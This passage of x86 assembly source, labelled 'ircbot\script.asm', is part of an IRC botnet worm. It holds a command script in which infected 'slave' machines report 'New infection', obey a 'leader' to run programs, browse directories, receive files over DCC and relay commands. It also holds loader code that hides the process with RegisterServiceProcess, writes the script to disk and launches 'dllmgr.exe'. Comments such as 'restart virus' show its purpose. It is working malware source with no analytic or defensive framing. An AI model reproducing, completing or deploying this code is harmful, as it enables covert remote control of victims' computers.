= PRIVMSG ; $recv = Channel or Person ; Hello child = Message to ; send db NoScan db "s" db "$0 Bhunji :New infection",0 db EndOfList NickIsBhunji: db "$2 :DCC ",0 db "|$2 ",2 dd AtDCCSend db "$2 :restart",0 db "f" dw ConnectFunction db "$2 :god",0 ; *** db "s" db "$0 Bhunji :$god",0 db "$2 :leader",0 ; *** db "s" db "$0 Bhunji :$leader",0 db "$2 :nick ",0 ; *** db "|$2 ",2 dd ChangeNickFunction db "$2 :cd ",0 db "|$2 ",2 dd SetPath db "$2 :dir ",0 db "|$2 ",2 dd CallDirFunction db NoScan db "l" dd LeaderMessages db EndOfList SetPath: db NoScan db "v" db "$path $3",0 db EndOfList CallDirFunction: db NoScan db "f" dw DirFunction db EndOfList ;------------------------- Messages from one of the slaves SlaveMessages: db "$2 :DCC",0 db "|$2 ",2 dd AtDCCSend db EndOfList SendScript: db NoScan db "v" db "$3 script.exe",0 AtDCCSend: db NoScan db "f" dw DCCSendFunction db EndOfList ; ------------------------------- Messages from the leader LeaderMessages: db "$2 :recursive ",0 ; *** db "s" db "$0 $slaves $2",0 db "$2 :join ",0 db "|$2 ",2 dd EnterChannelFunction db "$2 :leave ",0 db "|$2 ",2 dd LeaveChannelFunction db "$2 :msg",0 ; *** db "|$2 ",3 dd MessageFunction db "$2 :slaves",0 ; *** db "s" db "$0 $recv :$slaves",0 db "$2 :run ",0 db "|$2 ",2 dd RunProgram db "$2 :Hello child",0 db "s" db "$0 $recv :Do you have place for me?",0 db "$2 :quit!!",0 ; *** db "f" dw QuitFunction db "$2 ",01,"DCC",0 ; leader sends a file db "|$2 ",3 ; $3 = send or chat dd DCCRecvProc ; $4 = additional data db "$2 :SEND:",0 db "|$2 ",2 dd CheckIfGotProgram db "$2 :No, ask ",0 db "|$2 ",3 dd NewLeader db EndOfList RunProgram: db NoScan db "f" dw ExecuteProgram db EndOfList CheckIfGotProgram: db NoScan db "f" dw ShouldRecieveProgram db EndOfList ; Change leader and restart NewLeader: db NoScan db "v" db "$leader $4",0 db NoScan db "l" dd StartCommands db EndOfList LeaveChannelFunction: db NoScan db "s" db "PART $3",0 db EndOfList ChangeNickFunction: db NoScan db "s" db "NICK $3",0 db EndOfList EnterChannelFunction: db NoScan db "s" db "JOIN $3",0 db EndOfList MessageFunction: db NoScan db "s" db "PRIVMSG $3 :$4",0 db EndOfList ; -------------------------------------------- DCC Handler DCCRecvProc: db "$3 SEND",0 db "f" dw DCCRecvFunction db EndOfList db "$4 CHAT",0 db "f" dw DCCChatFunction db EndOfList ; ------------------------------------ If leader is online IsOnMessage: ; if leader isnt online, change name to leader db "!$1 $leader",0 db "l" dd Restart db "!$1 $slave1",0 db "v" db "$slave1 ",0 db "!$1 $slave2",0 db "v" db "$slave2 ",0 db "!$1 $slave3",0 db "v" db "$slave3 ",0 db "!$1 $slave4",0 db "v" db "$slave4 ",0 db "!$1 $slave5",0 db "v" db "$slave5 ",0 db EndOfList Restart: db NoScan db "s" db "NICK $leader",0 ; new leader is god db NoScan db "v" db "$leader $god",0 ; restart virus ; ----------------------- Commands to send when registered StartCommands: ; Check if leader is online db NoScan db "s" db "ISON $leader",0 db NoScan db "s" db "PRIVMSG $leader :Hello master",0 db EndOfList ; Dont change anything below ; Messages not beginning with ':' ListOfDownloadedFiles: db EndOfList EndOfScript: db 10 dup (0) .code ScriptFileName db "script.dat",0 BotFileName db "dllmgr.exe",0 Kernel32 db "kernel32",0 RegisterService db "RegisterServiceProcess", 0 HideProgram: invoke GetModuleHandleA, offset Kernel32 invoke GetProcAddress, eax, offset RegisterService test eax,eax jz NoHide push 1 push 0 call eax NoHide: ret MyOpenFile: xor edx,edx invoke CreateFileA, eax, ebx, edx, edx, ecx, edx, edx mov ebx, eax cmp eax,INVALID_HANDLE_VALUE ret Main: xor esi, esi call HideProgram WaitUntilBotIsDead: invoke Sleep, 1000 mov eax,offset BotFileName mov ebx,GENERIC_READ mov ecx,OPEN_ALWAYS call MyOpenFile jz WaitUntilBotIsDead invoke CloseHandle, ebx mov eax,offset ScriptFileName mov ebx,GENERIC_WRITE mov ecx,CREATE_ALWAYS call MyOpenFile jz Error push esi mov ecx,esp invoke WriteFile, ebx, offset BeginOfScript, EndOfScript-BeginOfScript, ecx, esi pop eax invoke CloseHandle, ebx invoke WinExec, offset BotFileName, SW_SHOW Error: invoke ExitProcess, 0 end Main ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[ircbot\script.asm]ÄÄÄ